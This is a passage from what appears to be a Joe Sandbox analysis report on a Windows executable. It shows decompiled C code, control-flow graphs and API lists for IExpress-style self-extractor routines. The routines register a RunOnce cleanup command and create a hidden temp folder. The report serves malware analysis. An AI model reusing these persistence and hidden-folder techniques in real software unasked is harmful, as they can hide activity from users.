                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                        • API String ID: 62482547-3460614246
                                                                                                                                                                                                        • Opcode ID: b9695f4bffba929761f01ad33ba11467d2e39de3e616cb962fe6ab5002b788af
                                                                                                                                                                                                        • Instruction ID: ee8330c990177def4320b5bbff4d521298b26b7c5a79f93f4867d1e76c94012f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b9695f4bffba929761f01ad33ba11467d2e39de3e616cb962fe6ab5002b788af
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8111A171200709ABDB207BB5AC89F6F37E9EB8C794B0804ADF956EB251DE31DC418671
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC6F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC6F40() {

				SetUnhandledExceptionFilter(E00BC6EF0); // executed
				return 0;
			}



                                                                                                                                                                                                        0x00bc6f45
                                                                                                                                                                                                        0x00bc6f4d

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00BC6F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: 1dae81d8f56bf25d79ef3d28fbd7a899cadf63df0390e6d3af661eb6f1ec09ec
                                                                                                                                                                                                        • Instruction ID: 2fd9d4b5370813d9b50521aab1e432e8d4fc72a2b534f86afc8a785ea1d5222c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1dae81d8f56bf25d79ef3d28fbd7a899cadf63df0390e6d3af661eb6f1ec09ec
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C69002742511054797101B709D19D1576D15A4E606B8654A5A111D54A4DF6050405513
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00BC202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00BC6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E00BC171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E00BC658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0xbc9a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0xbc91e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0xbc91e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xbc91e5);
						if(_t90 != 0) {
							 *0xbc8580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
							E00BC171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E00BC44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E00BC658A( &_v268, 0x104, 0xbc1140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0xbc8530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                        0x00bc202a
                                                                                                                                                                                                        0x00bc2035
                                                                                                                                                                                                        0x00bc203c
                                                                                                                                                                                                        0x00bc2041
                                                                                                                                                                                                        0x00bc2050
                                                                                                                                                                                                        0x00bc205f
                                                                                                                                                                                                        0x00bc2064
                                                                                                                                                                                                        0x00bc206f
                                                                                                                                                                                                        0x00bc208c
                                                                                                                                                                                                        0x00bc2094
                                                                                                                                                                                                        0x00bc2257
                                                                                                                                                                                                        0x00bc2266
                                                                                                                                                                                                        0x00bc2266
                                                                                                                                                                                                        0x00bc209a
                                                                                                                                                                                                        0x00bc209b
                                                                                                                                                                                                        0x00bc209d
                                                                                                                                                                                                        0x00bc20aa
                                                                                                                                                                                                        0x00bc20af
                                                                                                                                                                                                        0x00bc20c9
                                                                                                                                                                                                        0x00bc20d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc20d3
                                                                                                                                                                                                        0x00bc20da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc20da
                                                                                                                                                                                                        0x00bc20e2
                                                                                                                                                                                                        0x00bc2103
                                                                                                                                                                                                        0x00bc210e
                                                                                                                                                                                                        0x00bc2116
                                                                                                                                                                                                        0x00bc2122
                                                                                                                                                                                                        0x00bc2128
                                                                                                                                                                                                        0x00bc212c
                                                                                                                                                                                                        0x00bc2179
                                                                                                                                                                                                        0x00bc2194
                                                                                                                                                                                                        0x00bc21de
                                                                                                                                                                                                        0x00bc21e4
                                                                                                                                                                                                        0x00bc2256
                                                                                                                                                                                                        0x00bc2256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2256
                                                                                                                                                                                                        0x00bc2196
                                                                                                                                                                                                        0x00bc2196
                                                                                                                                                                                                        0x00bc219c
                                                                                                                                                                                                        0x00bc219f
                                                                                                                                                                                                        0x00bc219f
                                                                                                                                                                                                        0x00bc21a1
                                                                                                                                                                                                        0x00bc21a2
                                                                                                                                                                                                        0x00bc21a6
                                                                                                                                                                                                        0x00bc21a8
                                                                                                                                                                                                        0x00bc21b0
                                                                                                                                                                                                        0x00bc21b0
                                                                                                                                                                                                        0x00bc21b2
                                                                                                                                                                                                        0x00bc21b3
                                                                                                                                                                                                        0x00bc21bc
                                                                                                                                                                                                        0x00bc21c7
                                                                                                                                                                                                        0x00bc21cb
                                                                                                                                                                                                        0x00bc21f1
                                                                                                                                                                                                        0x00bc21f6
                                                                                                                                                                                                        0x00bc21fd
                                                                                                                                                                                                        0x00bc21ff
                                                                                                                                                                                                        0x00bc21ff
                                                                                                                                                                                                        0x00bc2204
                                                                                                                                                                                                        0x00bc2213
                                                                                                                                                                                                        0x00bc2218
                                                                                                                                                                                                        0x00bc221d
                                                                                                                                                                                                        0x00bc221d
                                                                                                                                                                                                        0x00bc2220
                                                                                                                                                                                                        0x00bc2220
                                                                                                                                                                                                        0x00bc2222
                                                                                                                                                                                                        0x00bc2223
                                                                                                                                                                                                        0x00bc2229
                                                                                                                                                                                                        0x00bc223d
                                                                                                                                                                                                        0x00bc2249
                                                                                                                                                                                                        0x00bc2250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2250
                                                                                                                                                                                                        0x00bc21d2
                                                                                                                                                                                                        0x00bc21d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc21d9
                                                                                                                                                                                                        0x00bc213a
                                                                                                                                                                                                        0x00bc2141
                                                                                                                                                                                                        0x00bc2144
                                                                                                                                                                                                        0x00bc214c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2163
                                                                                                                                                                                                        0x00bc2172
                                                                                                                                                                                                        0x00bc2172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc2163
                                                                                                                                                                                                        0x00bc20ea
                                                                                                                                                                                                        0x00bc20f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC2050
                                                                                                                                                                                                        • memset.MSVCRT ref: 00BC205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00BC208C
                                                                                                                                                                                                          • Part of subcall function 00BC171E: _vsnprintf.MSVCRT ref: 00BC1750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC20C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC20EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00BC2103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC2122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00BC2134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC2144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00BC215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC21C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC21E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00BC223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC2249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00BC2250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 178549006-2663108224
                                                                                                                                                                                                        • Opcode ID: a339ec66a3a566bed752fe520ec691e93b30073f0ea6b49aa8cb1311aa7ba2ad
                                                                                                                                                                                                        • Instruction ID: 329eda73cf4bdd0349549b82ddac4d078e6b9d5f875ab3f24ff54af07f2ab712
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a339ec66a3a566bed752fe520ec691e93b30073f0ea6b49aa8cb1311aa7ba2ad
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7351D371A40218ABDB20AB64DC4DFEB77ACEB59740F0401ECFA49F7151DE719E498A60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 232 bc55a0-bc55d9 call bc468f LocalAlloc 235 bc55fd-bc560c call bc468f 232->235 236 bc55db-bc55f1 call bc44b9 call bc6285 232->236 241 bc560e-bc5630 call bc44b9 LocalFree 235->241 242 bc5632-bc5643 lstrcmpA 235->242 251 bc55f6-bc55f8 236->251 241->251 245 bc564b-bc5659 LocalFree 242->245 246 bc5645 242->246 249 bc565b-bc565d 245->249 250 bc5696-bc569c 245->250 246->245 254 bc565f-bc5667 249->254 255 bc5669 249->255 252 bc589f-bc58b5 call bc6517 250->252 253 bc56a2-bc56a8 250->253 256 bc58b7-bc58c7 call bc6ce0 251->256 252->256 253->252 257 bc56ae-bc56c1 GetTempPathA 253->257 254->255 258 bc566b-bc567a call bc5467 254->258 255->258 262 bc56f3-bc5711 call bc1781 257->262 263 bc56c3-bc56c9 call bc5467 257->263 270 bc589b-bc589d 258->270 271 bc5680-bc5691 call bc44b9 258->271 275 bc586c-bc5890 GetWindowsDirectoryA call bc597d 262->275 276 bc5717-bc5729 GetDriveTypeA 262->276 269 bc56ce-bc56d0 263->269 269->270 273 bc56d6-bc56df call bc2630 269->273 270->256 271->251 273->262 288 bc56e1-bc56ed call bc5467 273->288 275->262 289 bc5896 275->289 280 bc572b-bc572e 276->280 281 bc5730-bc5740 GetFileAttributesA 276->281 280->281 282 bc5742-bc5745 280->282 281->282 283 bc577e-bc578f call bc597d 281->283 286 bc576b 282->286 287 bc5747-bc574f 282->287 298 bc5791-bc579e call bc2630 283->298 299 bc57b2-bc57bf call bc2630 283->299 291 bc5771-bc5779 286->291 287->291 292 bc5751-bc5753 287->292 288->262 288->270 289->270 296 bc5864-bc5866 291->296 292->291 295 bc5755-bc5762 call bc6952 292->295 295->286 309 bc5764-bc5769 295->309 296->275 296->276 298->286 306 bc57a0-bc57b0 call bc597d 298->306 307 bc57c1-bc57cd GetWindowsDirectoryA 299->307 308 bc57d3-bc57f8 call bc658a GetFileAttributesA 299->308 306->286 306->299 307->308 314 bc580a 308->314 315 bc57fa-bc5808 CreateDirectoryA 308->315 309->283 309->286 316 bc580d-bc580f 314->316 315->316 317 bc5827-bc585c SetFileAttributesA call bc1781 call bc5467 316->317 318 bc5811-bc5825 316->318 317->270 323 bc585e 317->323 318->296 323->296
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00BC55A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t28 ^ _t110;
				_t2 = E00BC468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E00BC468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0xbc9a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0xbc8b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0xbc8a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00BC6517(_t82, 0x7d2, 0, E00BC3210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0xbc9a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0xbc91e4;
									_t40 = GetTempPathA(0x104, 0xbc91e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00BC1781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00BC6952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E00BC597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00BC2630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E00BC658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0xbc91e4;
																					E00BC1781(0xbc91e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00BC5467(0xbc91e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00BC2630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E00BC597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00BC5467(0xbc91e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0xbc91e4;
											_t70 = E00BC2630(0, 0xbc91e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0xbc91e4;
												_t71 = E00BC5467(0xbc91e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E00BC597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0xbc8b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00BC5467(0xbc8b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E00BC44B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E00BC44B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0xbc9124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E00BC44B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0xbc9124 = E00BC6285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00BC6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                        0x00bc55ab
                                                                                                                                                                                                        0x00bc55b2
                                                                                                                                                                                                        0x00bc55c9
                                                                                                                                                                                                        0x00bc55d5
                                                                                                                                                                                                        0x00bc55d9
                                                                                                                                                                                                        0x00bc5600
                                                                                                                                                                                                        0x00bc5605
                                                                                                                                                                                                        0x00bc560a
                                                                                                                                                                                                        0x00bc560c
                                                                                                                                                                                                        0x00bc5638
                                                                                                                                                                                                        0x00bc5641
                                                                                                                                                                                                        0x00bc5643
                                                                                                                                                                                                        0x00bc5645
                                                                                                                                                                                                        0x00bc5645
                                                                                                                                                                                                        0x00bc564c
                                                                                                                                                                                                        0x00bc5652
                                                                                                                                                                                                        0x00bc5657
                                                                                                                                                                                                        0x00bc5659
                                                                                                                                                                                                        0x00bc5696
                                                                                                                                                                                                        0x00bc569c
                                                                                                                                                                                                        0x00bc589f
                                                                                                                                                                                                        0x00bc58a7
                                                                                                                                                                                                        0x00bc58ac
                                                                                                                                                                                                        0x00bc58b3
                                                                                                                                                                                                        0x00bc58b5
                                                                                                                                                                                                        0x00bc56a2
                                                                                                                                                                                                        0x00bc56a2
                                                                                                                                                                                                        0x00bc56a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc56ae
                                                                                                                                                                                                        0x00bc56ae
                                                                                                                                                                                                        0x00bc56b9
                                                                                                                                                                                                        0x00bc56bf
                                                                                                                                                                                                        0x00bc56c1
                                                                                                                                                                                                        0x00bc56f3
                                                                                                                                                                                                        0x00bc56f3
                                                                                                                                                                                                        0x00bc5705
                                                                                                                                                                                                        0x00bc570a
                                                                                                                                                                                                        0x00bc5711
                                                                                                                                                                                                        0x00bc5717
                                                                                                                                                                                                        0x00bc5724
                                                                                                                                                                                                        0x00bc5726
                                                                                                                                                                                                        0x00bc5729
                                                                                                                                                                                                        0x00bc5730
                                                                                                                                                                                                        0x00bc5737
                                                                                                                                                                                                        0x00bc573d
                                                                                                                                                                                                        0x00bc5740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc572b
                                                                                                                                                                                                        0x00bc572b
                                                                                                                                                                                                        0x00bc572e
                                                                                                                                                                                                        0x00bc5742
                                                                                                                                                                                                        0x00bc5742
                                                                                                                                                                                                        0x00bc5745
                                                                                                                                                                                                        0x00bc576b
                                                                                                                                                                                                        0x00bc576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5747
                                                                                                                                                                                                        0x00bc5747
                                                                                                                                                                                                        0x00bc574d
                                                                                                                                                                                                        0x00bc574f
                                                                                                                                                                                                        0x00bc5771
                                                                                                                                                                                                        0x00bc5771
                                                                                                                                                                                                        0x00bc5773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5751
                                                                                                                                                                                                        0x00bc5751
                                                                                                                                                                                                        0x00bc5753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5755
                                                                                                                                                                                                        0x00bc575b
                                                                                                                                                                                                        0x00bc5760
                                                                                                                                                                                                        0x00bc5762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5764
                                                                                                                                                                                                        0x00bc5764
                                                                                                                                                                                                        0x00bc5769
                                                                                                                                                                                                        0x00bc577e
                                                                                                                                                                                                        0x00bc577e
                                                                                                                                                                                                        0x00bc5781
                                                                                                                                                                                                        0x00bc5788
                                                                                                                                                                                                        0x00bc578d
                                                                                                                                                                                                        0x00bc578f
                                                                                                                                                                                                        0x00bc57b2
                                                                                                                                                                                                        0x00bc57b8
                                                                                                                                                                                                        0x00bc57bd
                                                                                                                                                                                                        0x00bc57bf
                                                                                                                                                                                                        0x00bc57cd
                                                                                                                                                                                                        0x00bc57cd
                                                                                                                                                                                                        0x00bc57dd
                                                                                                                                                                                                        0x00bc57e3
                                                                                                                                                                                                        0x00bc57ef
                                                                                                                                                                                                        0x00bc57f5
                                                                                                                                                                                                        0x00bc57f8
                                                                                                                                                                                                        0x00bc580a
                                                                                                                                                                                                        0x00bc580a
                                                                                                                                                                                                        0x00bc57fa
                                                                                                                                                                                                        0x00bc5802
                                                                                                                                                                                                        0x00bc5802
                                                                                                                                                                                                        0x00bc580d
                                                                                                                                                                                                        0x00bc580f
